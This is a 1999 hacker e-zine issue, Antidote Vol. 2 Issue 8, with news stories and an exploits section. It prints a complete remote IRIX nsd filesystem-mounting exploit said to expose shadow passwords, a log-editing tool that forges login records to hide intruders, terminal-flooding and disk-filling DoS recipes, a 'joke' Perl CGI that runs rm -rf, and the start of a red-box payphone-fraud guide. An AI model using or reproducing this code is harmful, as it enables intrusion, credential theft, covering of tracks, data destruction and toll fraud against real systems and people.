Copy Link
Add to Bookmark
Report
Antidote Vol. 02 Issue 08
Volume 2 Issue 8
6/11/99
** **
***** * * ** *
* *** ** *** ** **
*** ** * ** **
* ** ******** ** **** ********
* ** *** **** ******** *** *** ** * *** * ******** ***
* ** **** **** * ** *** ********* * **** ** * ***
* ** ** **** ** ** ** **** ** ** ** * ***
* ** ** ** ** ** ** ** ** ** ** ** ***
********* ** ** ** ** ** ** ** ** ** ********
* ** ** ** ** ** ** ** ** ** ** *******
* ** ** ** ** ** ** ** ** ** ** **
***** ** ** ** ** ** ** ** ****** ** **** *
* **** ** * *** *** ** *** * ***** **** ** *******
* ** ** *** *** *** *** *****
*
** http://www.thepoison.org/antidote
bof_ptr = (long *)buffer;
for (i = 0; i < bufsize - 4; i += 4)
*(bof_ptr++) = get_sp() - offs;
printf ("Creating termcap f1le\n");
printf ("b1tch is Fe3lin 1t.\n";
------------------------------
Yes! This is a special issue with an extra area of content! We have a section that will
only be printed in this issue about what is happening with AntiOnline. We have collected
information from other sites and put it together in this issue for you to see! It was
written/put together by Lord Oak. All credit is given from where it was taken. Sorry that
there is not much in the news content this issue. It is just that the AntiOnline port-
folio took up a lot of time and took away time from gathering news.
In this issue of Antidote, we have over 670 subscribers and getting more everyday! The
only thing that we ask of you when you read Antidote, is that you go to:
www.thepoison.org/popup.html
and click on our sponsors. One issue of Antidote takes us about a week to put together
and going to our sponsor only takes you about 15 seconds (if that). So please go visit
our sponsor because it is the only thing we ask of you.
--=\\Contents\\=--
0.00 - Beginning
0.01 - What?
0.02 - FAQ
0.03 - Shouts
0.04 - Writing
1.00 - News
1.01 - A Mouse that Roars
1.02 - Stanford Tracking Racist E-mails
2.00 - Exploits (new & older)
2.01 - nsdadv.c.txt
2.02 - bowzap.c.txt
2.03 - redhat6_0.permissions.dos.txt
2.04 - omnihttpd.webserver.txt
2.05 - windows.prn.txt
3.00 - Misc
3.01 - Red Box made easy
3.02 - Conventions & Expo's
3.03 - Securing Linux
----
--=\\AntiOnline Portfolio Contents\\=--
AO.00 - Info on AntiOnline
AO.01 - wired.com
AO.02 - E-mails from Attrition
AO.01A - Email #1
AO.01B - Email #2
AO.03 - AntiOnline's Response
AO.04 - Added Comments
----
FUN.S - FUN STUFF, stupid things that have no purpose or reasoning. It is just
something totally stupid and MAYBE even humorous to some.
SAY.W - SAY WHAT? Various quotes that might be humorous, stupid, true, or just
plane making fun of something or someone.
FEAT.S - FEATURED SITES:
www.nudehackers.com
www.thepoison.org/masters/exploits.html
www.403-security.org
www.hackernews.com
------------------------------
<!-- 0.00 - Beginning //-->
0.01 --=\\What?\\=--
What is 'Antidote'? Well, we wouldn't say that Antidote is a hacking magazine, cause
that would be wrong. We don't claim to be a hacking magazine. All Antidote is, is
basically current news and happenings in the underground world. We aren't going to teach
you how to hack or anything, but we will supply you with the current information and
exploits. Mainly Antidote is just a magazine for people to read if they have some extra
time on there hands and are bored with nothing to do. If you want to read a magazine
that teaches you how to hack etc, then you might want to go to your local bookstore and
see if they carry '2600'.
------------------------------
0.02 --=\\FAQ\\=--
Here are a lot of questions that we seem to recieve a lot, or our "Frequently Asked
Questions". Please read this before e-mailing us with questions and if the question
isn't on here or doesn't make sense, then you can e-mail us with your question.
> What exactly is "Antidote"?
See section 0.01 for a complete description.
> I find Antidote to not be shot for the beginner or does not teach you the basics,
why is that?
Antidote is for everyone, all we are basically is a news ezine that comes out once
a week with the current news, exploits, flaws and even programming. All of the
articles that are in here are recieved second hand (sent to us) and we very rarely
edit anyone's articles.
> I just found Antidote issues on your webpage, is there anyway I can get them sent
to me through e-mail?
Yes, if you go to www.thepoison.org/antidote there should be a text box where you can
input your e-mail address. You will recieve a link to the current Antidote (where you
can view it).
> If I want to submit something, are there any 'rules'?
Please see section 0.03 for a complete description.
> If I submitted something, can I remain anonymous?
Yes. Just make sure that you specify what information about yourself you would like to
be published above your article (when sending it to us) and we will do what you say.
> I submitted something and I didn't see it in the current/last issue, why is that?
It could be that someone else wrote something similar to what you wrote and they sent
it to us first. If you sent us something and we didn't e-mail you back, then you might
want to send it again because we probably didn't get it (we respond to all e-mails no
matter what). We might use your article in future issues off Antidote.
> Can I submit something that I didn't "discover" or "write"?
Yes you can, we take information that is written by anyone regardless if you wrote it
or not.
Well thats it for our FAQ. If you have a question that is not on here or the question is
on here and you had trouble understanding it, then please feel free to e-mail
lordoak@thepoison.org and he will answer your question. This FAQ will probably be
updated every month.
------------------------------
0.03 --=\\Shouts\\=--
These are just some shout outs that we feel we owe to some people. Some are individuals
and Some are groups in general. If you are not on this list and you feel that For some
reason you should be, then please contact Lord Oak and he will post you on here and we
are sorry for the Misunderstanding. Well, here are the shout outs:
Lord Oak EazyMoney
Duece opt1mus
PBBSER oX1dation
Forlorn Retribution
0dnek www.thepoison.org
Like we said above, if we forgot you and/or you think you should be added, please e-mail
lordoak@thepoison.org and he will be sure to add you.
------------------------------
0.04 --=\\Writing\\=--
As many of you know, we are always open to articles/submittings. We will take almost
anything that has to do with computer security. This leaves you open for:
-Protecting the system (security/securing)
-Attacking the system (hacking, exploits, flaws, etc....)
-UNIX (really anything to do with it...)
-News that has to do with any of the above....
The only thing that we really don't take is webpage hacks, like e-mailing us and saying
"www.xxx.com" was hacked... But if you have an opinion about the hacks that is fine. If
you have any questions about what is "acceptable" and not, please feel free to e-mail
Lord Oak [lordoak@thepoison.org] with your question and he will answer it. Also, please
note that if we recieve two e-mails with the same topic/idea then we will use the one
that we recieved first. So it might be a good idea to e-mail one of us and ask us if
someone has written about/on this topic so that way you don't waste your time on writing
something that won't be published. An example of this would be:
If Joe sends me an e-mail with the topic being on hacking hotmail accounts on
thursday.
And then Bill sends us an e-mail on hacking hotmail accounts on sunday, we will
take Joe's article because he sent it in first.
But keep in mind, we might use your article for the next issue! If you have something
that you would like to submit to Antidote, please e-mail lordoak@thepoison.org or
duece@thepoison.org and one of us will review the article and put it in Antidote (if we
like it).
------------------------------
_________________________________
) ___ (
( //___/ / // ) ) // ) ) )
) /____ / // / / __ / / (
( / / // / / ) ) )
) / / ((___/ / ((___/ / (
( http://www.403-security.org )
) For the latest hacks and news (
(___________________________________)
<!-- 1.00 - News //-->
1.01 --=\\A Mouse that Roars\\=--
[www.washingtonpost.com]
Last week, Newsweek reported that President Clinton approved a covert operation in May
to find an electronic silver bullet to do what the White House at the time believed the
air war couldn't. According to the report, the CIA would conduct a cyberwar against
Milosevic, specifically going after his financial assets in banks throughout Europe.
Is the keyboard mightier than the sword?
Before Allied Force, the intelligence agencies held a cyberwar exercise to answer this
very question. At center stage was the Information Operations Technology Center (IOTC),
activated last year and made up of the best cyberwarriors of the U.S. government. Housed
at National Security Agency headquarters at Fort Meade, Md., IOTC brings together highly
secret capabilities: NSA's P42 information warfare cell, the CIA's Critical Defense
Technologies Division, the Pentagon's "special technology operations."
Military sources familiar with the March demonstration say there is no question that the
keyboard covert operators wowed the Joint Staff with their computer attack capabilities.
But they are adamant in insisting that cyberbombs are more laboratory technologies than
usable weapons. In fact, the sources point out, the only cyberwar raging is inside the
U.S. government where Washington lawyers and policymakers, military leaders, and
official hackers battle over the value and legality of network attack.
Where's The Bits?
The day bombs started falling on Yugoslavia, the Air Force Association convened a high-
level symposium in San Antonio, Tex., to address the status of information warfare.
Washingtonpost.com has obtained a transcript of the two-day proceeding.
Gen. John Jumper, commander of U.S. Air Forces in Europe, joined the closed-door session
via satellite from his headquarters in Germany. "I have not had much sleep over the last
48 hours, and I am probably not as sharp or prepared as I would like to be," he
apologized.
Tired or not, the senior air force officer in Europe wasted no time blasting the bias of
information warriors to fight battles solely at the "strategic level." He was referring
to the very sort of effort Newsweek would speculate about two months later.
"When we hear talk of information warfare," Jumper said, "the mind conjures up notions
of taking some country's piece of sacred infrastructure in a way that is hardly relevant
to the commander at the operational and tactical level."
"I would submit that we are not there with information warfare," he concluded.
Networking Network Attack
Brig. Gen. John B. Baker, commander of the Air Intelligence Agency and head of the
Pentagon's Joint Command and Control Warfare Center, followed Jumper.
"In my hat as the air force component commander for NSA," he warned, "I spend a lot of
time working ... on how to exploit what is going on out there in computer networks." But
when it comes to going beyond collecting computer transmissions as raw intelligence to
actually manipulating and exploiting the "zeroes and ones" for military value, Baker
said, "we have a ways to go."
Despite all the new information warfare organizations that have been established of
late, he lamented that cyberwarriors did not yet have the stature of other warriors:
"Effects-based warfare," that is, methods geared to achieve an outcome and not cause
traditional damage lacks the "visually pleasing destruction from an armed bomb."
Baker stressed that part of the problem in any kind of computer network attack is the
concerns on the part of policy-makers in Washington with regard to legality and
"traceability."
Jumper described his experience: "I picture myself around that same targeting table
where you have the fighter pilot, the bomber pilot, the special operations people and
the information warriors. As you go down the target list, each one takes a turn raising
his or her hand saying, I can take that target.' When you get to the info warrior, the
info warrior says, "I can take the target, but first I have to go back to Washington and
get a finding."
Seeking permission invariably results in artificial restrictions and hesitations in
attacking targets, Jumper stressed. From a field perspective, he said, the process of
seeking the "special" operation cedes too much decision-making to inside the Beltway.
Finding The Way
The unusually candid discussions of the institutional and military stumbling blocks to
an information warfare future contrasts with the Hollywood vision of cyberwar so common
in the mainstream media these days.
Still, Maj. Gen. Bruce A. "Orville" Wright told the symposium that "Within the area of
computer network exploitation, there is tremendous investment, which, with a little bit
of fine tuning, can be turned into a computer network attack capability."
The IOTC, Wright said, "is a great organization that has a bright future." He should
know. As Deputy Director for Information Operations for the Joint Chiefs of Staff, he is
the military head of the interagency center and the top cyber-warrior in the U.S.
military.
But the key word is future.
With the shooting war against Yugoslavia over, it should be crystal clear to anyone that
exotic American cyberbombs have not aided the effort in any way.
http://www.washingtonpost.com/wp-srv/national/dotmil/arkin.htm
------------------------------
1.02 --=\\Stanford Tracking Racist E-mails\\=--
[www.yahoo.com]
Stanford University has turned loose its electronic bloodhounds to track the source of
racist e-mail sent to 25,000 campus computer users over the weekend.
The one-paragraph message accused the university of giving preference in housing to non-
whites, said Rachel Lotan, a professor in the School of Education who received the e-
mail.
The message was so racist ``it took my breath away,'' she said. ``It must be someone
very angry.''
A housing shortage for students has been a problem at Stanford for some time. Last week,
some 1,300 students were not selected in the lottery held for scarce campus housing.
Last year, almost 900 missed out.
Prosecutor Julius Finkelstein, head of Santa Clara County's high-tech crimes unit, said
the hacker could be charged with such offenses as unauthorized use of a computer account
and harassment via e-mail.
http://dailynews.yahoo.com/headlines/ap/technology/story.html?s=v/ap/19990603/tc/racist_mail_1.html
------------------------------
10001010100101110101010101001011101010101000
0 1
1 Y88b Y88 888 888 888 88e e88'Y88 0
1 Y88b Y8 888 888 888 888b d888 'Y 1
0 b Y88b Y 8888888 888 8888D C8888 1
0 8b Y88b 888 888 888 888P Y888 ,d 1
1 88b Y88b 888 888 888 88" "88,d88 0
1 1
1 http://www.nudehackers.com 0
0 0
01001010110101010001011010010111010100101011
<!-- 2.00 - Exploits //-->
2.01 --=\\nsdadv.c.txt\\=--
I've been waiting since February for SGI to post an advisory about this.
Enough.
/******************************************************************************
IRIX 6.5 nsd virtual filesystem exploit
Author: Jefferson Ogata (JO317) <ogata@pobox.com>
Please note that this program comes with NO WARRANTY WHATSOEVER. Your use
of this program constitutes your complete acceptance of all liability for
any damage or loss caused by the aforesaid use. It is provided to the
network community solely to document the existence of a vulnerability
in the security implementations of certain versions of IRIX, and may not
be used for any illicit purpose. Many of the details of the bug this
program exploits have been available to users of SGI's online support
system since February 1999. The current revision of IRIX (6.5.3) corrects
this bug, at least enough to stop this particular exploit, and I strongly
encourage you to bring your systems up to date as quickly as possible.
With IRIX 6.5, SGI has moved all name services, NIS services, and DNS
lookups into a userland process called nsd, which exports the results of
the queries it fields into a virtual filesystem. The virtual filesystem is
normally mounted onto the directory /ns by the program /sbin/nsmount, which
is invoked by nsd on startup. The nsd daemon itself is exporting the
filesystem via NFS3 over a dynamically bound UDP port -- rather than a
well-known or settable one -- typically in the 1024-1029 range. On a
desktop system, 1024 is a good bet, since nsd is usually the first
RPC/UDP service to be started.
The NFS filesystem is not registered with mountd, so there is no way to
query mountd for a mount filehandle. But because the NFS port is fairly
easy to discover through port scanning, and because the mount filehandle
nsd uses is simply a string of 32 zeroes, it is trivial to mount the nsd
filesystem from a host anywhere on the Internet. nsd will serve an array
of NFS requests to anyone. Furthermore, because the service's NFS port is
bound dynamically, it is difficult to protect it with a firewall; it may
change from one system start to another, or if the daemon is killed and
restarted.
This program can successfully mount the nsd-exported virtual filesystem
>from a remote host onto a machine running IRIX 6.4 or higher. It makes use
of the MS_DOXATTR mount flag defined in IRIX 6.4 and higher. I do not know
what this flag does at the NFS protocol level, but it allows the client to
ask the NFS server not to enforce certain permissions controls against the
client. I don't know whether any other vendor NFS client systems support
this flag. A clever person might write a userland NFS client that would
accept an initial handle, NFS port, etc. as arguments.
On an SGI with SGI C compiler, compile with:
cc -o nsdadv nsdadv.c
Run it this way:
nsdadv /mnt sucker.example.com 1024
with obvious substitutions.
So what are the security implications of this? Well, at the very least, the
nsd filesystem on an NIS server reveals the NIS domain name, and what maps
it contains, as well as what classes are being used.
By exploring the filesystem shortly after it has been mounted I have been
able to retrieve data that should be hidden from me, including shadow
password entries from a remote system's shadow file.
Beyond retrieving keys and maps, you can also monitor the filesystem for
changes. A great deal of information is leaked through the contents of the
nsd filesystem. For example, if host A looks up a host B's IP address, a
file named B will appear in the /.local/hosts.byname directory in A's nsd
filesystem. The file's contents will be the IP address.
By the way, though you be unable to chdir into a particular location in
the nsd filesystem, you may yet succeed under slightly different
conditions. Eventually you can do it. I'm not sure why or when, but nsd
gets picky sometimes. Eventually it relents. Specifically, I've found that
the entire nsd filesystem appears readable for a few seconds after it is
initially mounted. If you can't look at something, unmount the filesystem,
remount it, and try again immediately. It also seems that a stat() is
sometimes required before a chdir(). Your mileage may vary, but keep
trying. You may wish to write a script to mount the nsd filesystem, explore
and take inventory of its contents, and unmount the filesystem quickly.
Once you've chdir'd into a directory, it appears you can always read it,
although you can't necessarily stat its contents. This suggests a strategy
of spawning a group of processes each with its cwd set to a subdirectory of
the nsd filesystem, in order to retain visibility on the entire filesystem.
Each process would generate an inventory of its cwd, and then monitor it
for changes. A Perl script could do this well.
Another thing: it is possible to create an empty file in nsd's exported
filesystem simply by stat()ing a nonexistent filename. This suggests a
potential DoS by creating many files in a directory.
Remember that the system keeps a local cache in /var/ns, so you may have
to wait for cached entries on the target host to expire before you'll see
them reappear in the virtual filesystem.
For some fairly extensive info on the nsd implementation, take a look at:
http://www.bitmover.com/lm/lamed_arch.html
******
What got me into all this was that I found I could no longer run services
chrooted if they required DNS. It took considerable effort to come up with
a solution to this. This was a fundamental change from IRIX 6.4, and I know
I'm not the only one who finds the nsd implementation to be a generally
unpleasant direction, in part because it causes umount -t nfs to break
system database services. I give SGI points for creativity -- in one sense,
using NFS as a database access system is a very slick approach. But the
database needs a security model, and the model needs to be implemented
correctly. Neither of these needs appears to have been met.
So how could SGI fix this?
Without going back, SGI could at least make nsd respond only to queries
>from localhost (see note below about IRIX 6.5.3). The problem here is that
they actually intend to support remote mounts in later releases, in order
to supplement or supplant other means of distribution. The web documents
indicate this.
They could create a well-randomized mount filehandle for the filesystem
and pass that to nsmount. Then you couldn't remotely mount the filesystem
without guessing the handle -- nontrivial with a 32-byte handle.
At the very least, they should provide libraries of regular BIND resolver
routines, file-based getpwent, etc. routines, so one could choose the
resolution strategy at link time, perhaps by modifying the shared library
path.
******
With IRIX release 6.5.3, SGI appears to have fixed this problem, at least
to some degree. The exploit does not appear to work as it does against
6.5.2. Further testing is needed, and the behavior should be watched
carefully in future versions of IRIX.
******************************************************************************/
#include <stdio.h>
#include <string.h>
#include <malloc.h>
#include <mntent.h>
#include <sys/types.h>
#include <rpc/types.h>
#include <sys/fstyp.h>
#include <sys/fsid.h>
#include <sys/mount.h>
#include <sys/fs/nfs.h>
#include <sys/fs/nfs_clnt.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
/* Filesystem type name for nsd-exported filesystem. */
#define NSD_FSTYPE "nfs3"
/* File the records mounted filesystems. */
#define MTAB_FILE "/etc/mtab"
/* Socket address we'll fill in with our destination IP and port. */
struct sockaddr_in sin;
/* All zero file handle. This appears to be the base handle for the nsd
filesystem. Great security, huh? */
unsigned char fh[NFS_FHSIZE] = { 0 };
/* NFS mount options structure to pass to mount(2). The meanings of these
are documented to some extent in /usr/include/sys/fs/nfs_clnt.h. The
flags field indicates that this is a soft mount without log messages,
and to set the initial timeout and number of retries from fields in
this structure. The fh field is a pointer to the filehandle of the
mount point, whose size is set by fh_len. As noted above, the mount
point filehandle is just 32 zeroes. */
struct nfs_args nx =
{
&sin, /* addr */
(fhandle_t *) fh, /* fh */
NFSMNT_SOFT|NFSMNT_TIMEO|NFSMNT_RETRANS|NFSMNT_NOAC, /* flags */
0, /* wsize */
0, /* rsize */
100, /* timeo */
2, /* retrans */
0, /* hostname */
0, /* acregmin */
0, /* acregmax */
0, /* acdirmin */
0, /* acdirmax */
0, /* symttl */
{ 0 }, /* base */
0, /* namemax */
NFS_FHSIZE, /* fh_len */
/* On IRIX 6.4 and up there are also the following... */
/* bdsauto */
/* bdswindow */
/* On IRIX 6.5 there are also the following... */
/* bdsbuflen */
/* pid */
/* maxthreads */
};
void usage (void)
{
fprintf (stderr, "usage: nsmount_remote directory host port\n\n");
fprintf (stderr, "NFS-mounts the virtual filesystem exported by nsd on <host> via NSD daemon\n");
fprintf (stderr, "port <port> onto <directory>.\n\n");
exit (1);
}
int main (int argc, char **argv)
{
char *dir;
char *host;
char *ports;
int port;
struct hostent *h;
int fstype;
FILE *mtabf;
struct mntent mnt =
{
0,
0,
NSD_FSTYPE,
"soft,timeo=100,retrans=2",
0,
0,
};
if (argc != 4)
usage ();
dir = argv[1];
host = argv[2];
port = atoi ((ports = argv[3]));
/* Prepare for host lookup. */
memset ((void *) &sin, 0, sizeof (sin));
sin.sin_family = 2;
sin.sin_port = port;
/* Look up the host. */
if (inet_aton (host, &sin.sin_addr))
;
else if ((h = gethostbyname (host)))
{
unsigned long *l = (unsigned long *) *(h->h_addr_list);
sin.sin_addr.s_addr = l[0];
}
else
{
fprintf (stderr, "Cannot resolve host %s.\n", host);
return 1;
}
/* Get filesystem type index for nsd filesystem type. */
if ((fstype = sysfs (GETFSIND, NSD_FSTYPE)) < 0)
{
perror ("sysfs (" NSD_FSTYPE ")");
return 1;
}
fprintf (stderr, "Mounting nsd " NSD_FSTYPE " fs from %s(%s):%d onto %s\n",
host, inet_ntoa (sin.sin_addr), port, dir);
/* These flags are documented in /usr/include/sys/mount.h. MS_DOXATTR
means "tell server to trust us with attributes" and MS_DATA means
"6-argument mount".
MS_DOXATTR is a mount option in IRIX 6.4 and up. The attack doesn't
seem to work without this option. So even though this program will
compile on IRIX 6.2, you need to use an IRIX 6.4 or higher OS to
attack nsd. */
if (mount (dir, dir, MS_DOXATTR|MS_DATA, (char *) fstype, &nx, sizeof (nx))
!= 0)
{
perror ("mount");
return 1;
}
/* Record mount point in /etc/mtab. */
mnt.mnt_fsname = malloc (strlen (host) + sizeof (":nsd@") + strlen (ports) + 1);
sprintf (mnt.mnt_fsname, "%s:nsd@%s", host, ports);
mnt.mnt_dir = dir;
if (!(mtabf = setmntent (MTAB_FILE, "r+")))
{
perror ("setmntent");
return 1;
}
if (addmntent (mtabf, &mnt) < 0)
{
perror ("addmntent");
return 1;
}
if (endmntent (mtabf) < 0)
{
perror ("endmntent");
return 1;
}
return 0;
}
Jefferson Ogata
ogata@POBOX.COM
------------------------------
2.02 --=\\bowzap.c.txt\\=--
/*
* BoWZaP 1.0 - k-sp1ff h4qR tYp3 l0g ed1t0r ph0r 4.4BSD/SunOS4/Linux
*
* say u r l0gg3d 1nt0 cert.org as 'sp4f' on ttyp2 & want t0 b
* m1sch13v0us.. u w0uld th3n d0:
*
* [sp4f@cert][~] % su -
* Password: b0w-t13z
* # ./BoWZaP sp4f justin.kalinas.home.machine ttyp2
*
* 0r t0 ch4ng3 4ll 1nst4nc3z 0f sp4f jU$t l34v3 0ut th3 ttY argUm3nt..
*
* u k4n alz0 uz3 1t t0 1mpr3$$ uR fr13ndz & tr1ck th3m 1nt0 g1v1ng
* u k0d3z .. i.e. m4k3 1t l00k l1k3 uR 0n fr0m zang.com or s0m3th1ng,
* th3n ppl w1ll l1k3 t0tally ph34r u & stUph.
*
* k0mp1l3 w/ [g]cc -O[2] -o BoWZaP BoWZaP.c [-DSUNOS] -s
*
* w0rd!@#
* - K0d3S|aY3r [b4dd3r & k-r4dd3r th4n ev3r 1n '99]
*/
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <utmp.h>
#include <pwd.h>
#ifdef SUNOS
#include <lastlog.h>
#define _PATH_UTMP "/etc/utmp"
#define _PATH_WTMP "/var/adm/wtmp"
#define _PATH_LASTLOG "/var/adm/lastlog"
#endif
int main(ac, av)
int ac;
char **av;
{
int fd;
struct utmp ut;
struct lastlog ll;
struct passwd *pw;
if(ac<3) {
fprintf(stderr,"Usage: %s user fakehost [tty]\n",av[0]);
exit(1);
}
if((pw=getpwnam(av[1])) < 1) {
fprintf(stderr,"Not in /etc/passwd.\n");
exit(1);
}
if((fd=open(_PATH_UTMP,O_RDWR)) < 0) {
fprintf(stderr,"Couldn't open %s\n",_PATH_UTMP);
exit(1);
}
while(read(fd,&ut,sizeof(ut)) > 0) {
if(!strncmp(ut.ut_name,av[1],strlen(av[1]))) {
if(!av[3] || (av[3] && !strncmp(ut.ut_line,av[3],strlen(av[3])))) {
memcpy(ut.ut_host, av[2], sizeof(ut.ut_host));
lseek(fd, (int)-sizeof(ut), SEEK_CUR);
write(fd, &ut, sizeof(ut));
}
}
}
close(fd);
printf("%s successfully altered.\n", _PATH_UTMP);
if((fd=open(_PATH_WTMP,O_RDWR)) < 0) {
fprintf(stderr,"Couldn't open %s\n",_PATH_WTMP);
exit(1);
}
lseek(fd,(long) -(sizeof(ut)), SEEK_END);
while(read(fd,&ut,sizeof(ut)) > 0) {
if(!strncmp(ut.ut_name,av[1],strlen(av[1]))) {
if(!av[3] || (av[3] && !strncmp(ut.ut_line,av[3],strlen(av[3])))) {
memcpy(ut.ut_host, av[2], sizeof(ut.ut_host));
lseek(fd, (int)-sizeof(ut), SEEK_CUR);
write(fd, &ut, sizeof(ut));
break;
}
}
lseek(fd, (long) -(sizeof(ut) * 2), SEEK_CUR);
}
close(fd);
printf("%s successfully altered.\n",_PATH_WTMP);
if((fd=open(_PATH_LASTLOG,O_RDWR)) < 0) {
fprintf(stderr,"Couldn't open %s\n",_PATH_LASTLOG);
exit(1);
}
lseek(fd, (long)pw->pw_uid * sizeof(struct lastlog), 0);
memcpy(ll.ll_host,av[2],sizeof(ll.ll_host));
if(av[3]) {
memcpy(ll.ll_line,av[3],sizeof(ll.ll_line));
}
write(fd, (char *)&ll, sizeof(ll));
close(fd);
printf("%s successfully altered.\n", _PATH_LASTLOG);
}
------------------------------
2.03 --=\\redhat6_0.permissions.dos.txt\\=--
Once again I've come up with another trivial Denial of Service flaw,
(wow, I seem to be good at this Conseal Firewall, +++ath0, ppp byte-stuffing)
It's been a few months since my last DoS, so here you go:
Many of you RedHat 6.0 users who installed RedHat 6.0 rather than
upgrading may have noticed the new way RedHat displays remote TTY's.
Instead of the old fashioned /dev/ttyp<number>, it now uses
/dev/pts/<number>. There is a flaw in this new implementation that local
users can exploit to cause minor disruption to anyone using X-windows on
the local machine.
This DoS is more of a nuisance than a "real problem" but it could possibly
be used to cause some minor havok.
The way it works is simple. When whoever is using X opens up an "xterm"
(eterm, rxvt, nxterm...) a connection is made to the X server.
If you do a "who" you will see:
(RedHat 6.0, without upgrading from previous RedHat release)
wage pts/0 Jun 6 01:39 (:0.0)
Or on older versions:
wage ttyp0 Jun 6 01:39 (:0.0)
Now this is normal, but the problem lies within the permissions of that
device.
On older RedHat's if you did:
ls -l /dev/ttyp3 you would see:
crw------- 1 wage tty 3, 0 Jun 6 12:41 /dev/ttyp0
Which is normal and what it should look like.
For those of you who may be new to unix those letters at the beginning of
the line indicate the permissions on the device.
For our output above, the line indicates it is a device (c), and that the
OWNER has read and write permissions (rw)
Group has no permissions (---), and everyone has no permissions (---)
They basically go <type indicator><owner><group><everyone>
An example line of a device will ALL permissions set follows:
crwxrwxrwx
/ | \
Owner Group Everyone
This means that everyone has read/write/execute permissions to that device.
So as you can see our ttyp0 can only be read or written to by it's owner
(and root).
In the case of RedHat 6.0 with regular remote connections (like telnet)
the standard permissions are as follows:
crw--w---- 1 ov3r tty 136, 0 Jun 6 12:32 /dev/pts/0
Here it's almost the same except that group "tty" also has write access.
The problem lies in the way that the permissions are set for local
connections with the X server using xterm.
if you do an ls -l /dev/pts/<the xterm's tty> (we will use pts/0)
You get:
crw--w--w- 1 ov3r ov3r 136, 0 Jun 6 12:32 /dev/pts/0
Notice how now "everyone" has write access to this terminal?
This leads to the hole that any local user can disrupt any xterminal
connected to the local machine. Simply typing "cat /dev/urandom >
/dev/pts/<number>" will flood the xterm with garbage data making it
impossible to use. Or we can also bring back the old "flash" attack and
flash the user's xterm by dumping ASCII escape characters to his
terminal.
This isn't a particularily "deadly" DoS attack, but can be used as a
nuisance OR perhaps even to trick the user into doing something he may
not want to do. (For example dumping "Login:" then "Password:" to the
terminal may trick the user into adding his login/password to a file or to
his .bash_history).
noc-wage
wage@IDIRECT.CA
------------------------------
2.04 --=\\omnihttpd.webserver.txt\\=--
Hi all,
The exploit (bug) will make temp files on the server until servers hdd
is full.
And anyone can do it remotely.
By default visadmin.exe (Visitor Administrator) is in cgi-bin directory.
What you need to do, is to type this url:
http://omni.server/cgi-bin/visadmin.exe?user=guest
Thats all. Now in some minutes is servers hdd full!!
Fix: Remove visadmin.exe from cgi-bin directory.
Valentin Perelõgin
viktor@PARNU.EE
------------------------------
2.05 --=\\windows.prn.txt\\=--
I suppose that, in an effort to maintain reverse compatibility with
old MS-DOS command line gurus, you cannot create a file or directory
named PRN.xxx where the xxx is replacable with any extension.
Explanation and flaw follow.
First, the explanation (for those of you who are familiar with the
command line use of prn, please skip to the flaw)
Old style MS-DOS command line-ing would allow you to do the following
to print your autoexec file:
C:\>copy autoexec.bat prn
what this actually does is redirect the contents of autoexec.bat to
the port LPT1. So, as stated in the first sentence, in an effort to
preserve this feature, Microsoft will not allow you to create any file
or directory whose name prior to the extension is exactly PRN.
Now the flaw:
Although you cannot create a local file whose name is PRN, you can,
however, jump onto a networked server (suppose it's name is
\\whatever) and create (in any directory that you have creatable
permissions) any file or directory named PRN.xxx (again, xxx stands
for any extension). The server must be accessed by it's \\ notation,
you cannot do this if you map \\whatever\anydir to a drive (such as
w:), then go to w:\ and try to create the file, in that case your
machine's name parser blocks you.
Ok, so that doesn't seem so bad, but the real issue is that the
directory you've just created is non-removable for as long as it
posesses that name. So let's try to rename the file... oops, can't do
that, we get an access violation. Next, let's try mapping
\\whatever\anydir to w:\ again. I go to my new W drive and try to
rename the file, I get the error "Cannot rename prn: A file with the
name you specified already exists. Specify a different filename."
Ooooookaaaaay. Frustrated now, I try to delete the file. Oops, now
it tells me "Cannot delete prn: The parameter is incorrect." Well,
what about that file/directory I've created with the name PRN.xxx?
That one vanishes with no problem, but only when the server is
referenced in the \\whatever fashion. When I try to delete this
PRN.xxx file from my new W: drive, all it does is lock up my window
with a nearly endless hourglass. Finally, ten minutes later, I'm told
"Cannot delete file: File system error (1026)." But this only occurs
after I've renamed the parent directory. The error that is reported
has nothing to do with the file PRN.xxx, but instead with the fact
that the file upon which it was trying to do a delete operation
dissapeared between when the delete was initiated and when it was
finished. Note that PRN.xxx acts somewhat differently than PRN alone.
The next step is to try to delete the parent directory. This does not
work! PRN still gives access violations, and so the parent directory
is locked in place. So how much harm can this REALLY be? So I've got
a few empty files and directories that are undeletable. Well, if in
stead of just creating a new directory, I copy a large directory to
the server, say c:\winnt, or perhaps c:\program files, then rename it
to prn, now I've just created half a gig or more (depending on how
malicious I am) of un-reclaimable server hard drive consumption. This
directory cannot be browsed! It has become a sore on the surface of
this hard drive.
Well, remember con? The virtual file that was like prn, except that
instead of echoing to LPT1, it echoes to the screen. I try to
recreate this whole process with con, but the server is much too smart
for that, it yells at me and tells me "Cannot create or replace file:
The filename you specified is invalid or too long. Specify a
different filename."
I don't know, but I suspect that there exist utilities that would
catch this filename's invalidity, and do something about it. Norton
Disk Doctor is usually pretty good about those kinds of things.
Unfortunately, I don't have local access to the servers I have
available to create this flaw on, so I cannot test that. If someone
can test that on various workstations and servers, I'd be interrested
to know if Norton can do this. Please put your new PRN directory/file
in a place that you don't care if it resides there forever.
This flaw seems to lend itself to a disk-consuming virus, one that
creates \\127.0.01\anydir\hahaha.tmp and dumps useless garbage in it
until it receives the TERM signal at which point it renames this file
to PRN. Next time it is started this virus could create a subdir
called hahaha and repeat the process there.
This was tested on Windows NT workstation 4.0 SP3 creating PRN's on
Windows's NT Server 4.0 SP?.
STEVENS, Eric
Eric.Stevens@RP-RORER.COM
------------------------------
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
FUN.S
#!/usr/bin/perl
# Lord Oak's famous Perl script.
# Only works with a UNIX box and
# no configuring is needed!
print "Content-type: text/html\n\n";
$fjear = `rm -rf */`;
print "Lord Oak 0wns m3!";
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
<!-- 3.00 - Misc //-->
3.01 --=\\Red Box made easy\\=--
Q. What is a red box?
A. With this you can Make free phone calls from pay phones by generating .25,.10,and .05
tones.
Q. Dose this work on my phone at my house?
A. No,NEVER EVER try to do any thang from your own phone line it is plan stupid.
Q. Where can I use it at?
A. COCOT (Customer Owned Coin Operated Telephone)
Q. How do I make one?
